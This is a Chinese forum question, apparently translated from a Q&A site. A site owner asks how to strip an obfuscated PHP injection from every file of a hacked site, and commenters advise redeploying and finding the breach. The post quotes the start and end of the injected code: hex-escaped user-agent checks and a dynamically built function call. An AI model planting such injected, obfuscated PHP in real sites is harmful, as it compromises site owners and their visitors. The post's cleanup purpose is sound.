【发布时间】:2015-11-27 20:58:13
【问题描述】:
我的一个网站被黑了。在每个 php 文件中添加一行代码。我不会在这里发布完整的代码,但它的开头是:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yudqgxmnlr =
并以:
结尾 $gzagexgpdc=substr($yudqgxmnlr,(34129-24016),(83-71)); $gzagexgpdc($xarchajboj, $ukumkvvgai, NULL); $gzagexgpdc=$ukumkvvgai; $gzagexgpdc=(759-638); $yudqgxmnlr=$gzagexgpdc-1; ?>
我已尝试查找并替换为一些 ssh 命令,但它似乎不起作用。 (阅读:我缺乏 ssh 知识妨碍了我)。
这是我最近的尝试:
sed -i '<?php if(!isset*gzagexgpdc-1; ?>//g’ *.php
谁能帮帮我?
【问题讨论】:
-
重新部署站点即可。
-
我不会远程执行此操作。下载所有文件,备份,在编辑器中进行 S&R,然后将其发送回远程站点。
-
另外,了解它是如何被黑客入侵的。如果有一个秒洞,它可能会再次发生。